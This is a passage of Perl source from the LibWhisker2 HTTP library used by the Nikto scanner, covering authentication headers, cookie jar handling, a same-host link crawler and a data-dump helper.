}\n\n########################################################################\n\n=item B<auth_unset>\n\nParams: \\%req\n\nReturn: nothing (modifies %req)\n\nModifies %req to disable all authentication (regular and proxy).\n\nNote: it only removes the values set by auth_set().  Manually-defined\n[Proxy-]Authorization headers will also be deleted (but you shouldn't \nbe using the auth_* functions if you're manually handling your own auth...)\n\n=cut\n\nsub auth_unset {\n    my $href = shift;\n    return if ( !defined $href || !ref($href) );\n    delete $$href{Authorization};\n    delete $$href{'Proxy-Authorization'};\n    delete $$href{whisker}->{auth_callback};\n    delete $$href{whisker}->{auth_proxy_callback};\n    delete $$href{whisker}->{auth_data};\n    delete $$href{whisker}->{auth_proxy_data};\n}\n\n########################################################################\n\n=item B<auth_set>\n\nParams: $auth_method, \\%req, $user, $password [, $domain]\n\nReturn: nothing (modifies %req)\n\nModifies %req to use the indicated authentication info.\n\nAuth_method can be: 'basic', 'proxy-basic', 'ntlm', 'proxy-ntlm'.\n\nNote: this function may not necessarily set any headers after being called.\nAlso, proxy-ntlm with SSL is not currently supported.\n\n=cut\n\nsub auth_set {\n    my ( $method, $href, $user, $pass, $domain ) = ( lc(shift), @_ );\n\n    return if ( !( defined $href && ref($href) ) );\n    return if ( !defined $user || !defined $pass );\n\n    if ( $method eq 'basic' ) {\n        $$href{'Authorization'} =\n          'Basic ' . encode_base64( $user . ':' . $pass, '' );\n    }\n\n    if ( $method eq 'proxy-basic' ) {\n        $$href{'Proxy-Authorization'} =\n          'Basic ' . encode_base64( $user . ':' . $pass, '' );\n    }\n\n    if ( $method eq 'ntlm' ) {\n        http_close($href);\n        $$href{whisker}->{auth_data} = ntlm_new( $user, $pass, $domain );\n        $$href{whisker}->{auth_callback} = \\&_ntlm_auth_callback;\n    }\n\n    if ( $method eq 'proxy-ntlm' ) {\n        utils_croak('',\"auth_set: proxy-ntlm auth w/ SSL not currently supported\")\n          if ( $href->{whisker}->{ssl} > 0 );\n        http_close($href);\n        $$href{whisker}->{auth_proxy_data} = ntlm_new( $user, $pass, $domain );\n        $$href{whisker}->{auth_proxy_callback} = \\&_ntlm_auth_proxy_callback;\n    }\n\n}\n\n\n########################################################################\n\n=item B<cookie_new_jar>\n\nParams: none\n\nReturn: $jar\n\nCreate a new cookie jar, for use with the other functions.  Even though\nthe jar is technically just a hash, you should still use this function\nin order to be future-compatible (should the jar format change).\n\n=cut\n\nsub cookie_new_jar {\n    return {};\n}\n\n########################################################################\n\n=item B<cookie_read>\n\nParams: $jar, \\%response [, \\%request, $reject ]\n\nReturn: $num_of_cookies_read\n\nRead in cookies from an %response hash, and put them in $jar.\n\nNotice: cookie_read uses internal magic done by http_do_request\nin order to read cookies regardless of 'Set-Cookie[2]' header\nappearance.\n\nIf the optional %request hash is supplied, then it will be used to\ncalculate default host and path values, in case the cookie doesn't\nspecify them explicitly.  If $reject is set to 1, then the %request\nhash values are used to calculate and reject cookies which are not\nappropriate for the path and domains of the given request.\n\n=cut\n\nsub cookie_read {\n    my ( $count, $jarref, $hrs, $hrq, $rej ) = ( 0, @_ );\n\n    return 0 if ( !( defined $jarref && ref($jarref) ) );\n    return 0 if ( !( defined $hrs   && ref($hrs) ) );\n    return 0\n      if (\n        !(\n            defined $$hrs{whisker}->{cookies}\n            && ref( $$hrs{whisker}->{cookies} )\n        )\n      );\n\n\t\tmy @opt;\n\t\tif(defined $hrq && ref($hrq)){\n\t\t\tpush @opt, $hrq->{whisker}->{host};\n\t\t\tmy $u = $hrq->{whisker}->{uri};\n\t\t\t$u=~s#/.*?$##;\n\t\t\t$u='/' if($u eq '');\n\t\t\tpush @opt, $u, $rej;\n\t\t}\n\n    foreach ( @{ $hrs->{whisker}->{cookies} } ) {\n        cookie_parse( $jarref, $_ , @opt);\n        $count++;\n    }\n    return $count;\n}\n\n########################################################################\n\n=item B<cookie_parse>\n\nParams: $jar, $cookie [, $default_domain, $default_path, $reject ]\n\nReturn: nothing\n\nParses the cookie into the various parts and then sets the appropriate \nvalues in the cookie $jar. If the cookie value is blank, it will delete \nit from the $jar.  See the 'docs/cookies.txt' document for a full\nexplanation of how Libwhisker parses cookies and what RFC aspects are \nsupported.\n\nThe optional $default_domain value is taken literally.  Values with no \nleading dot (e.g. 'www.host.com') are considered to be strict hostnames \nand will only match the identical hostname.  Values with leading dots (e.g. \n'.host.com') are treated as sub-domain matches for a single domain level.\nIf the cookie does not indicate a domain, and a $default_domain is not\nprovided, then the cookie is considered to match all domains/hosts.\n\nThe optional $default_path is used when the cookie does not specify a path.\n$default_path must be absolute (start with '/'), or it will be ignored.  If\nthe cookie does not specify a path, and $default_path is not provided, then\nthe default value '/' will be used.\n\nSet $reject to 1 if you wish to reject cookies based upon the provided\n$default_domain and $default_path.  Note that $default_domain and \n$default_path must be specified for $reject to actually do something \nmeaningful.\n\n=cut\n\nsub cookie_parse {\n    my ( $jarref, $header ) = (shift, shift);\n\t\tmy ( $Dd, $Dp, $R ) = (shift, shift, shift||0);\n\n    return if ( !( defined $jarref && ref($jarref) ) );\n    return if ( !( defined $header && length($header) > 0 ) );\n\n\t\tmy @C = ( undef, undef, undef, undef, 0 );\n\n\t\t$header =~ tr/\\r\\n//d;\n\t\tmy ($f,%seen,$n,$t) = (1);\n    while( length($header) ){\n    \t$header =~ s/^[ \\t]+//;\n    \tlast if(!($header =~ s/^([^ \\t=;]+)//));\n\t\t\t# LW2.5 change: cookie name is no longer lower-cased\n    \t# my $an = lc($1);\n    \tmy $an = $1;\n\t\t\tmy $av = undef;\n    \t$header =~ s/^[ \\t]+//;\n    \tif(substr($header,0,1) eq '='){\n    \t\t$header=~s/^=[ \\t]*//;\n    \t\tif(substr($header,0,1) eq '\"'){\n    \t\t\tmy $p = index($header,'\"',1);\n    \t\t\tlast if($p == -1);\n    \t\t\t$av = substr($header,1,$p-1);\n    \t\t\tsubstr($header,0,$p+1)='';\n    \t\t} else {\n\t\t\t\t\t$av = $1 if($header =~ s/^([^ \\t;,]*)//);\n    \t\t}\n    \t} else {\n    \t\tmy $p = index($header,';');\n    \t\tsubstr($header,0,$p)='';\n    \t}\n    \t$header =~ s/^.*?;//;\n\t\t\tif($f){\n\t\t\t\treturn if(!defined $av);\n\t\t\t\t($f,$n,$C[0])=(0,$an,$av);\n\t\t\t} else {\n\t\t\t\t$seen{$an}=$av if(!exists $seen{$an});\n  \t\t}\n    }\n\n\t\treturn if(!defined $n || $n eq '');\n\t\tmy $del = 0;\n\t\t$del++ if($C[0] eq '');\n\t\t$del++ if(defined $seen{'max-age'} && $seen{'max-age'} eq '0');\n\t\tif($del){\n        delete $$jarref{$n} if exists $$jarref{$n};\t\t\t\n        return;\n\t\t}\n\n\t\tif(defined $seen{domain} && $seen{domain} ne ''){\n\t\t\t$t = $seen{domain};\n\t\t\t$t='.'.$t if(substr($t,0,1) ne '.' && !_is_ip_address($t));\n\t\t} else {\n\t\t\t$t=$Dd;\n\t\t}\n\t\t$t=~s/\\.+$// if(defined $t);\n\t\t$C[1]=$t;\n\n\t\tif(defined $seen{path}){\n\t\t\t$t = $seen{path};\n\t\t} else {\n\t\t\t$t=$Dp || '/';\n\t\t}\n\t\t$t=~s#/+$##;\n\t\t$t='/' if(substr($t,0,1) ne '/');\n\t\t$C[2]=$t;\n\n\t\t$C[4]=1 if(exists $seen{secure});\n\n\t\treturn if($R && !_is_valid_cookie_match($C[1], $C[2], $Dd, $Dp));\n    $$jarref{$n} = \\@C;\n}\n\n########################################################################\n\nsub _is_ip_address {\n\tmy $n = shift;\n\treturn 1 if($n=~/^[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}\\.[0-9]{1,3}$/);\n\treturn 0;\n}\n\nsub _is_valid_cookie_match {\n\tmy ($cd, $cp, $td, $tp) = @_;\n\treturn 0 if(index($tp,$cp)!=0);\n\tif(substr($cd,0,1) eq '.'){\n\t\tif( $td =~ /(.+)$cd$/ ){\n\t\t\treturn 1 if(index($1,'.') == -1);\n\t\t}\n\t\treturn 0;\n\t} else {\n\t\treturn 0 if($cd ne $td);\n\t}\n\treturn 1;\n}\n\n########################################################################\n\n=item B<cookie_write>\n\nParams: $jar, \\%request, $override\n\nReturn: nothing\n\nGoes through the given $jar and sets the Cookie header in %req pending the \ncorrect domain and path.  If $override is true, then the secure, domain and \npath restrictions of the cookies are ignored and all cookies are essentially\nincluded.\n\nNotice: cookie expiration is currently not implemented.  URL restriction\ncomparison is also case-insensitive.\n\n=cut\n\nsub cookie_write {\n    my ( $jarref, $hin, $override ) = @_;\n    my ( $name, $out ) = ( '', '' );\n\n    return if ( !( defined $jarref && ref($jarref) ) );\n    return if ( !( defined $hin    && ref($hin) ) );\n\n    $override ||= 0;\n    $$hin{'whisker'}->{'ssl'} ||= 0;\n\n    foreach $name ( keys %$jarref ) {\n        next if ( $name eq '' );\n        if($override){\n            $out .= \"$name=$$jarref{$name}->[0];\";\n            next;\n        }\n        next if ( $$hin{'whisker'}->{'ssl'} == 0 && $$jarref{$name}->[4] > 0 );\n        if ( $$hin{'whisker'}->{'host'} =~ /$$jarref{$name}->[1]$/i\n                && $$hin{'whisker'}->{'uri'} =~ /^$$jarref{$name}->[2]/ )\n        {\n            $out .= \"$name=$$jarref{$name}->[0];\";\n        }\n    }\n\n    if ( $out ne '' ) { $$hin{'Cookie'} = $out; }\n\n}\n\n########################################################################\n\n=item B<cookie_get>\n\nParams: $jar, $name\n\nReturn: @elements\n\nFetch the named cookie from the $jar, and return the components.  The\nreturned items will be an array in the following order:\n\nvalue, domain, path, expire, secure\n\nvalue  = cookie value, should always be non-empty string\ndomain = domain root for cookie, can be undefined\npath   = URL path for cookie, should always be a non-empty string\nexpire = undefined (depreciated, but exists for backwards-compatibility)\nsecure = whether or not the cookie is limited to HTTPs; value is 0 or 1\n\n=cut\n\nsub cookie_get {\n    my ( $jarref, $name ) = @_;\n\n    return undef if ( !( defined $jarref && ref($jarref) ) );\n\n    if ( defined $$jarref{$name} ) {\n        return @{ $$jarref{$name} };\n    }\n\n    return undef;\n}\n\n########################################################################\n\n=item B<cookie_get_names>\n\nParams: $jar\n\nReturn: @names\n\nFetch all the cookie names from the jar, which then let you cookei_get()\nthem individually.\n\n=cut\n\nsub cookie_get_names {\n    my ( $jarref, $name ) = @_;\n\n    return undef if ( !( defined $jarref && ref($jarref) ) );\n    return keys %$jarref;\n}\n\n########################################################################\n\n=item B<cookie_get_valid_names>\n\nParams: $jar, $domain, $url, $ssl\n\nReturn: @names\n\nFetch all the cookie names from the jar which are valid for the given\n$domain, $url, and $ssl values.  $domain should be string scalar of the\ntarget host domain ('www.example.com', etc.).  $url should be the absolute \nURL for the page ('/index.html', '/cgi-bin/foo.cgi', etc.).  $ssl should be \n0 for non-secure cookies, or 1 for all (secure and normal) cookies.  The \nreturn value is an array of names compatible with cookie_get().\n\n=cut\n\nsub cookie_get_valid_names {\n    my ( $jarref, $domain, $url, $ssl ) = @_;\n\n    return () if ( !( defined $jarref && ref($jarref) ) );\n\t\treturn () if ( !defined $domain || $domain eq '' );\n\t\treturn () if ( !defined $url || $url eq '' );\n\t\t$ssl ||= 0;\n\n\t\tmy (@r, $name);\n    foreach $name ( keys %$jarref ) {\n        next if ( $name eq '' );\n        next if ( $$jarref{$name}->[4] > 0 && $ssl == 0 );\n        if ( $domain =~ /$$jarref{$name}->[1]$/i\n                && $url =~ /^$$jarref{$name}->[2])/i ) {\n            push @r, $name;\n        }\n    }\n    \n    return @r;\n}\n\n\n########################################################################\n\n=item B<cookie_set>\n\nParams: $jar, $name, $value, $domain, $path, $expire, $secure\n\nReturn: nothing\n\nSet the named cookie with the provided values into the %jar.  $name is \nrequired to be a non-empty string.  $value is required, and will delete\nthe named cookie from the $jar if it is an empty string.  $domain and\n$path can be strings or undefined.  $expire is ignored (but exists\nfor backwards-compatibility).  $secure should be the numeric value of\n0 or 1.\n\n=cut\n\nsub cookie_set {\n    my ( $jarref, $name, $value, $domain, $path, $expire, $secure ) = @_;\n    my @construct;\n\n    return if ( !( defined $jarref && ref($jarref) ) );\n\n    return if ( $name eq '' );\n    if ( !defined $value || $value eq '' ) {\n        delete $$jarref{$name};\n        return;\n    }\n    $path ||= '/';\n    $secure ||= 0;\n\n    @construct = ( $value, $domain, $path, undef, $secure );\n    $$jarref{$name} = \\@construct;\n}\n\n########################################################################\n\n\n#####################################################\n\n# cluster global variables\n%_crawl_config = (\n    'save_cookies'         => 0,\n    'reuse_cookies'        => 1,\n    'save_offsites'        => 0,\n    'save_non_http'        => 0,\n    'follow_moves'         => 1,\n    'url_limit'            => 1000,\n    'use_params'           => 0,\n    'params_double_record' => 0,\n    'skip_ext'             => {\n        gif => 1,\n        jpg => 1,\n        png => 1,\n        gz  => 1,\n        swf => 1,\n        pdf => 1,\n        zip => 1,\n        wav => 1,\n        mp3 => 1,\n        asf => 1,\n        tgz => 1\n    },\n    'save_skipped'    => 0,\n    'save_referrers'  => 0,\n    'use_referrers'   => 1,\n    'do_head'         => 0,\n    'callback'        => 0,\n    'netloc_bug'      => 1,\n    'normalize_uri'   => 1,\n    'source_callback' => 0\n);\n\n%_crawl_linktags = (\n    'a'          => 'href',\n    'applet'     => [qw(codebase archive code)],\n    'area'       => 'href',\n    'base'       => 'href',\n    'bgsound'    => 'src',\n    'blockquote' => 'cite',\n    'body'       => 'background',\n    'del'        => 'cite',\n    'embed'      => [qw(src pluginspage)],\n    'form'       => 'action',\n    'frame'      => [qw(src longdesc)],\n    'iframe'     => [qw(src longdesc)],\n    'ilayer'     => 'background',\n    'img'        => [qw(src lowsrc longdesc usemap)],\n    'input'      => [qw(src usemap)],\n    'ins'        => 'cite',\n    'isindex'    => 'action',\n    'head'       => 'profile',\n    'layer'      => [qw(background src)],\n    'link'       => 'href',\n\n    #\t 'meta'    => 'http-equiv',\n    'object' => [qw(codebase data archive usemap)],\n    'q'      => 'cite',\n    'script' => 'src',\n    'table'  => 'background',\n    'td'     => 'background',\n    'th'     => 'background',\n    'xmp'    => 'href',\n);\n\n#####################################################\n\n=item B<crawl_new>\n\nParams: $START, $MAX_DEPTH, \\%request_hash [, \\%tracking_hash ]\n\nReturn: $crawl_object\n\nThe crawl_new() functions initializes a crawl object (hash) to the default\nvalues, and then returns it for later use by crawl().  $START is the starting\nURL (in the form of 'http://www.host.com/url'), and MAX_DEPTH is the maximum\nnumber of levels to crawl (the START URL counts as 1, so a value of 2 will\ncrawl the START URL and all URLs found on that page).  The request_hash\nis a standard initialized request hash to be used for requests; you should\nset any authentication information or headers in this hash in order for\nthe crawler to use them.  The optional tracking_hash lets you supply a\nhash for use in tracking URL results (otherwise crawl_new() will allocate\na new anon hash).\n\n=cut\n\nsub crawl_new {\n    my ( $start, $depth, $reqref, $trackref ) = @_;\n    my %X;\n\n    return undef if ( !defined $start  || !defined $depth );\n    return undef if ( !defined $reqref || !ref($reqref) );\n    $trackref = {} if ( !defined $trackref || !ref($trackref) );\n\n    $X{track}   = $trackref;\n    $X{request} = $reqref;\n    $X{depth}   = $depth || 2;\n    $X{start}   = $start;\n    $X{magic}   = 7340;\n\n    $X{reset} = sub {\n        $X{errors}      = [];    # all errors encountered\n        $X{urls}        = [];    # temp; used to hold all URLs on page\n        $X{server_tags} = {};    # all server tags found\n        $X{referrers}   = {};    # who refers to what URLs\n        $X{offsites}    = {};    # all URLs that point offsite\n        $X{response}    = {};    # temp; the response hash\n        $X{non_http}    = {};    # all non_http URLs found\n        $X{cookies}     = {};    # all cookies found\n        $X{forms}       = {};    # all forms found\n        $X{jar}         = {};    # temp; cookie jar\n        $X{url_queue}   = [];    # temp; URLs to still fetch\n\n        $X{config} = {};\n        %{ $X{config} } = %_crawl_config;\n\n        %{ $X{track} } = ();\n        $X{parsed_page_count} = 0;\n    };\n\n    $X{crawl} = sub { crawl( \\%X, @_ ) };\n    $X{reset}->();\n\n    return \\%X;\n}\n\n#####################################################\n\n=item B<crawl>\n\nParams: $crawl_object [, $START, $MAX_DEPTH ]\n\nReturn: $count [ undef on error ] \n\nThe heart of the crawl package.  Will perform an HTTP crawl on the\nspecified HOST, starting at START URI, proceeding up to MAX_DEPTH. \n\nCrawl_object needs to be the variable returned by crawl_new().  You can\nalso indirectly call crawl() via the crawl_object itself:\n\n\t$crawl_object->{crawl}->($START,$MAX_DEPTH)\n\nReturns the number of URLs actually crawled (not including those skipped).\n\n=cut\n\n{    # START OF CRAWL CONTAINER\n\n    sub crawl {\n        my ( $C, $START, $MAX_DEPTH ) = @_;\n        return undef if ( !defined $C || !ref($C) || $C->{magic} != 7340 );\n\n        # shortcuts, to reduce dereferences and typing\n        my $CONFIG = $C->{config};\n        my $TRACK  = $C->{track};\n        my $URLS   = $C->{urls};\n        my $RESP   = $C->{response};\n        my $REQ    = $C->{request};\n        my $Q      = $C->{url_queue};\n\n        $START ||= $C->{start};\n        $C->{depth} = $MAX_DEPTH || $C->{depth};\n\n        my ( $COUNT, $T, @ST ) = ( 0, '' );\n\n        # ST[] = [ 0.HOST, 1.PORT, 2.URL, 3.DEPTH, 4.CWD, 5.REF ]\n\n        my @v = uri_split($START);\n\n        my $error = undef;\n        $error = 'Start protocol not http or https'\n          if ( $v[1] ne 'http' && $v[1] ne 'https' );\n        $error = 'Bad start host' if ( !defined $v[2] || $v[2] eq '' );\n        push( @{ $C->{errors} }, $error ) && return undef if ( defined $error );\n\n        @ST = ( $v[2], $v[3], $v[0], 1, '', '' );\n\n        $REQ->{whisker}->{ssl}  = 1 if ( $v[1] eq 'https' );\n        $REQ->{whisker}->{host} = $ST[0];\n        $REQ->{whisker}->{port} = $ST[1];\n        $REQ->{whisker}->{lowercase_incoming_headers} = 1;\n        $REQ->{whisker}->{ignore_duplicate_headers}   = 0;\n        delete $REQ->{whisker}->{parameters};\n        http_fixup_request($REQ);\n\n        push @$Q, \\@ST;\n\n        while (@$Q) {\n            @ST = @{ shift @$Q };\n\n            next if ( defined $TRACK->{ $ST[2] } && $TRACK->{ $ST[2] } ne '?' );\n            if ( $ST[3] > $C->{depth} ) {\n                $TRACK->{ $ST[2] } = '?' if ( $CONFIG->{save_skipped} > 0 );\n                next;\n            }\n\n            $ST[4] = uri_get_dir( $ST[2] );\n            $REQ->{whisker}->{uri} = $ST[2];\n            if ( $ST[5] ne '' && $CONFIG->{use_referrers} > 0 ) {\n                $REQ->{Referrer} = $ST[5];\n            }\n\n            my $result = _crawl_do_request( $REQ, $RESP, $C );\n            if ( $result == 1 || $result == 2 ) {\n                push @{ $C->{errors} }, \"$ST[2]: $RESP->{whisker}->{error}\";\n                next;\n            }\n\n            $COUNT++;\n            $TRACK->{ $ST[2] } = $RESP->{whisker}->{code}\n              if ( $result == 0 || $result == 4 );\n            $TRACK->{ $ST[2] } = '?'\n              if ( ( $result == 3 || $result == 5 )\n                && $CONFIG->{save_skipped} > 0 );\n\n            if ( defined $RESP->{server} && !ref( $RESP->{server} ) ) {\n                $C->{server_tags}->{ $RESP->{server} }++;\n            }\n\n            if ( defined $RESP->{'set-cookie'} ) {\n                if ( $CONFIG->{save_cookies} > 0 ) {\n                    if ( ref( $RESP->{'set-cookie'} ) ) {\n                        $C->{cookies}->{$_}++\n                          foreach ( @{ $RESP->{'set-cookie'} } );\n                    }\n                    else {\n                        $C->{cookies}->{ $RESP->{'set-cookie'} }++;\n                    }\n                }\n                cookie_read( $C->{jar}, $RESP )\n                  if ( $CONFIG->{reuse_cookies} > 0 );\n            }\n\n            next if ( $result == 4 || $result == 5 );\n            next if ( scalar @$Q > $CONFIG->{url_limit} );\n\n            if ( $result == 0 ) {    # page should be parsed\n                if ( $CONFIG->{source_callback} != 0\n                    && ref( $CONFIG->{source_callback} ) eq 'CODE' )\n                {\n                    &{ $CONFIG->{source_callback} }($C);\n                }\n\n                html_find_tags( \\$RESP->{whisker}->{data},\n                    \\&_crawl_extract_links_test, 0, $C, \\%_crawl_linktags );\n                $C->{parsed_page_count}++;\n            }\n\n            push @$URLS, $RESP->{location} if ( $result == 3 );\n\n            foreach $T (@$URLS) {\n                $T =~ tr/\\0\\r\\n//d;\n                next if ( length($T) == 0 );\n                next if ( $T =~ /^#/i );       # fragment\n\n                push @{ $C->{referrers}->{$T} }, $ST[2]\n                  if ( $CONFIG->{save_referrers} > 0 );\n\n                if (   $T =~ /^([a-zA-Z0-9]*):/\n                    && lc($1) ne 'http'\n                    && lc($1) ne 'https' )\n                {\n                    push @{ $C->{non_http}->{$T} }, $ST[2]\n                      if ( $CONFIG->{save_non_http} > 0 );\n                    next;\n                }\n\n                if ( substr( $T, 0, 2 ) eq '//' && $CONFIG->{netloc_bug} > 0 ) {\n                    if ( $REQ->{whisker}->{ssl} > 0 ) { $T = 'https:' . $T; }\n                    else { $T = 'http:' . $T; }\n                }\n                if ( $CONFIG->{callback} != 0 ) {\n                    next if &{ $CONFIG->{callback} }( $T, $C );\n                }\n\n                $T = uri_absolute( $T, $ST[4], $CONFIG->{normalize_uri} );\n\n                # (uri,protocol,host,port,params,frag,user,pass)\n                @v = uri_split($T);\n\n                # make sure URL is on same host and port\n                if (   ( defined $v[2] && $v[2] ne $ST[0] )\n                    || ( $v[3] > 0 && $v[3] != $ST[1] ) )\n                {\n                    $C->{offsites}->{ uri_join(@v) }++\n                      if ( $CONFIG->{save_offsites} > 0 );\n                    next;\n                }\n\n                if ( $v[0] =~ /\\.([a-z0-9]+)$/i ) {\n                    if ( defined $CONFIG->{skip_ext}->{ lc($1) } ) {\n                        $TRACK->{ $v[0] } = '?'\n                          if ( $CONFIG->{save_skipped} > 0 );\n                        next;\n                    }\n                }\n\n                if ( defined $v[4] && $CONFIG->{use_params} > 0 ) {\n                    $TRACK->{ $v[0] } = '?'\n                      if ( $CONFIG->{params_double_record} > 0\n                        && !defined $TRACK->{ $v[0] } );\n                    $v[0] .= '?' . $v[4];\n                }\n\n                next\n                  if ( defined $TRACK->{ $v[0] } )\n                  ;    # we've processed this already\n\n                # ST[] = [ 0.HOST, 1.PORT, 2.URL, 3.DEPTH, 4.CWD, 5.REF ]\n                push @$Q, [ $ST[0], $ST[1], $v[0], $ST[3] + 1, '', $ST[2] ];\n            }    # foreach\n\n            @$URLS = ();    # reset for next round\n        }    # while\n\n        return $COUNT;\n    }    # end sub crawl\n\n#####################################################\n\n    sub _crawl_extract_links_test {\n        my ( $TAG, $hr, $dr, $start, $len, $OBJ ) = ( lc(shift), @_ );\n\n        return undef if ( !scalar %$hr );    # fastpath quickie\n\n        # we know this is defined, due to our tagmap\n        my $t = $_crawl_linktags{$TAG};\n\n\t# lowercase tags for normalization to prevent undefined behavior\n\t# See: https://github.com/sullo/nikto/issues/142\n\t$hr = { map lc, %$hr };\n\n        while ( my ( $key, $val ) = each %$hr ) {    # normalize element values\n            $$hr{ $key } = $val;\n        }\n\n        # all of this just to catch meta refresh URLs\n        if (   $TAG eq 'meta'\n            && defined $$hr{'http-equiv'}\n            && $$hr{'http-equiv'} eq 'refresh'\n            && defined $$hr{'content'}\n            && $$hr{'content'} =~ m/url=(.+)/i )\n        {\n            push( @{ $OBJ->{urls} }, $1 );\n\n        }\n        elsif ( ref($t) ) {\n            foreach (@$t) {\n                push( @{ $OBJ->{urls} }, $$hr{$_} ) if ( defined $$hr{$_} );\n            }\n        }\n        else {\n            push( @{ $OBJ->{urls} }, $$hr{$t} ) if ( defined $$hr{$t} );\n        }\n\n        if ( $TAG eq 'form' && defined $$hr{action} ) {\n            my $u = $OBJ->{response}->{whisker}->{uri};\n            $OBJ->{forms}->{ uri_absolute( $$hr{action}, $u, 1 ) }++;\n        }\n\n        return undef;\n    }\n\n################################################################\n\n    sub _crawl_do_request_ex {\n        my ( $hrin, $hrout, $OBJ ) = @_;\n        my $ret;\n\n        $ret = http_do_request( $hrin, $hrout );\n\n        return ( 2, $ret )\n          if ( $ret == 2 );     # if there was connection error, do not continue\n        if   ( $ret == 0 ) {    # successful request\n\n            # WARNING: what if *all* HEAD responses are 302'd on purpose, but\n            #          all GETs are normal?\n            if (   $$hrout{whisker}->{code} < 308\n                && $$hrout{whisker}->{code} > 300 )\n            {\n                if ( $OBJ->{config}->{follow_moves} > 0 ) {\n                    return ( 3, $ret )\n                      if ( defined $$hrout{location}\n                        && !ref( $$hrout{location} ) );\n                }\n                return ( 5, $ret );    # not avail\n            }\n\n            if ( $$hrout{whisker}->{code} == 200 ) {\n\n                # no content-type is treated as text/htm\n                if ( defined $$hrout{'content-type'}\n                    && $$hrout{'content-type'} !~ /^text\\/htm/i )\n                {\n                    return ( 4, $ret );\n                }\n            }\n        }\n        return ( -1, $ret );    # fallthrough\n    }\n\n################################################################\n\n    sub _crawl_do_request {\n        my ( $hrin, $hrout, $OBJ ) = @_;\n        my ( $cret, $lwret );\n\n        if ( $OBJ->{config}->{do_head} && $$hrin{whisker}->{method} ne 'HEAD' )\n        {\n            my $save = $$hrin{whisker}->{method};\n            $$hrin{whisker}->{method} = 'HEAD';\n            ( $cret, $lwret ) = _crawl_do_request_ex( $hrin, $hrout, $OBJ );\n            $$hrin{whisker}->{method} = $save;\n\n            return $cret if ( $cret > 0 );\n\n            if ( $lwret == 0 ) {    # successful request\n                if ( $$hrout{whisker}->{code} == 501 ) {    # HEAD not allowed\n                    $OBJ->{config}->{do_head} = 0;    # no more HEAD requests\n                }\n            }\n\n            # request errors are essentially redone via GET, below\n        }\n\n        ( $cret, $lwret ) = _crawl_do_request_ex( $hrin, $hrout, $OBJ );\n        return $lwret if ( $cret < 0 );\n        return $cret;\n    }\n\n}    # CRAWL_CONTAINER\n\n################################################################\n\n\n########################################################################\n\n=item B<dump>\n\nParams: $name, \\@array [, $name, \\%hash, $name, \\$scalar ]\n\nReturn: $code [ undef on error ]\n\nThe dump function will take the given $name and data reference, and\nwill create an ASCII perl code representation suitable for eval'ing\nlater to recreate the same structure.  $name is the name of the variable\nthat it will be saved as.  Example:\n\n $output = LW2::dump('request',\\%request);\n\nNOTE: dump() creates anonymous structures under the name given.  For\nexample, if you dump the hash %hin under the name 'hin', then when you\neval the dumped code you will need to use %$hin, since $hin is now a\n*reference* to a hash.\n\n=cut\n\nsub dump {\n    my %what = @_;\n    my ( $final, $k, $v ) = ('');\n    while ( ( $k, $v ) = each %what ) {\n        return undef if ( ref($k) || !ref($v) );\n        $final .= \"\\$$k = \" . _dump( 1, $v, 1 );\n        $final =~ s#,\\n$##;\n        $final .= \";\\n\";\n    }\n    return $final;\n}\n\n########################################################################\n\n=item B<dump_writefile>\n\nParams: $file, $name, \\@array [, $name, \\%hash, $name, \\@scalar ]\n\nReturn: 0 if success; 1 if error\n\nThis calls dump() and saves the output to the specified $file.  \n\nNote: LW does not checking on the validity of the file name, it's\ncreation, or anything of the sort.  Files are opened in overwrite\nmode.\n\n=cut\n\n# sub dump_writefile {\n#     my $file   = shift;\n#     my $output = &dump(@_);\n#     return 1 if ( !open( OUT, \">$file\" ) || !defined $output );\n#     binmode(OUT);\n#     print OUT $output;\n#     close(OUT);\n# }\n\n########################################################################\n\nsub _dump {    # dereference and dump an element\n    my ( $t,   $ref, $depth ) = @_;\n    my $out;\n    $depth ||= 1;\n    \n    # to protect against circular loops\n    return 'undef' if ( $depth > 128 );\n    if ( !defined $ref ) {\n        return 'undef';\n    }\n    elsif ( ref($ref) eq 'HASH' ) {\n        $out .= \"{\\n\";\n        foreach my $k (sort keys %$ref) {\n            my $v = $ref->{$k};\n            $out .= \"\\t\" x $t;\n            $out .= _dumpd($k) . ' => ';\n            if ( ref($v) ) { $out .= _dump( $t + 1, $v, $depth + 1 ); }\n            else { $out .= _dumpd($v); }\n            $out .= \",\\n\" unless ( substr( $out, -2, 2 ) eq \",\\n\" );\n        }\n        $out =~ s#,\\n$#\\n#;\n        $out .= \"\\t\" x ( $t - 1 );\n        $out .= \"},\\n\";\n    }\n    elsif ( ref($ref) eq 'ARRAY' ) {\n        $out .= \"[\";\n        if ( ~~@$ref ) {\n            $out .= \"\\n\";\n            foreach $v (@$ref) {\n                $out .= \"\\t\" x $t;\n                if ( ref($v) ) { $out .= _dump( $t + 1, $v, $depth + 1 ); }\n                else { $out .= _dumpd($v); }\n                $out .= \",\\n\" unless ( substr( $out, -2, 2 ) eq \",\\n\" );\n            }\n            $out =~ s#,\\n$#\\n#;\n            $out .= \"\\t\" x ( $t - 1 );\n        }\n        $out .= \"],\\n\";\n    }\n    elsif ( ref($ref) eq 'SCALAR' ) {\n        $out .= _dumpd($$ref);\n    }\n    elsif ( ref($ref) eq 'REF' ) {\n        $out .= _dump( $t, $$ref, $depth + 1 );\n    }\n    elsif ( ref($ref) ) {    # unknown/unsupported ref\n        $out .= \"undef\";\n    }\n    else {                   # normal scalar\n        $out .= _dumpd($ref);\n    }\n    return $out;\n}\n\n########################################################################\n\nsub _dumpd {                 # escape a scalar string\n    my $v = shift;\n    return 'undef' if ( !defined $v );\n    return \"''\"    if ( $v eq '' );\n    return \"$v\"    if ( $v eq '0' || $v !~ tr/0-9//c && $v !~ m#^0+# );\n    if ( $v !~ tr/ !-~//c ) {\n        $v =~ s/(['\\\\])/\\\\$1/g;\n        return \"'$v'\";\n    }\n    $v =~ s#\\\\#\\\\\\\\#g;\n    $v =~ s#\"#\\\\\"#g;\n    $v =~ s#\\r#\\\\r#g;\n    $v =~ s#\\n#\\\\n#g;\n    $v =~ s#\\t#\\\\t#g;\n    $v =~ s#\\$#\\\\\\$#g;\n    $v =~ s#([^!-~ ])#sprintf('\\\\x%02x',ord($1))#eg;\n    return \"\\\"$v\\\"\";\n}\n\n########################################################################\n\n\n########################################################################\n\n{    # package variables\n    my $MIMEBASE64_TRYLOADING = 1;\n\n########################################################################\n\n=item B<encode_base64>\n\nParams: $data [, $eol]\n\nReturn: $b64_encoded_data\n\nThis function does Base64 encoding.  If the binary MIME::Base64 module\nis available, it will use that; otherwise, it falls back to an internal\nperl version.  The perl 